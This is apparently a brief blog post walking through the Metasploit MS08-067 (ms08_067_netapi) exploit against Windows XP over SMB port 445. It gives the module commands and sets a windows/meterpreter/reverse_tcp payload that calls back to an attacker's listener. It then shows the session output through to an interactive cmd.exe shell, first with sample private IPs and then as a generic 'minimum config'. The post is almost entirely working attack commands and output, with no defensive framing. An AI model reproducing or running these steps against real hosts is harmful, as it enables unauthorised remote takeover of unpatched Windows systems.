control – metasploit ms08_067_netapi

One trick pony!

Look for port 445 open

use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit

[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once done you need to open the console by typing the bellow after the >

meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…

Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Min required config to work

msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set rhost (IP-Address)

msf exploit(ms08_067_netapi) > set lhost (IP-Address)

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on (IP-Address):4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (752128 bytes) to (IP-Address)
[*] Meterpreter session 1 opened ((IP-Address):4444 -> (IP-Address):1046) at 2010-04-03 16:30:40 +0100

meterpreter > shell
Process 612 created.
Channel 1 created.
Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s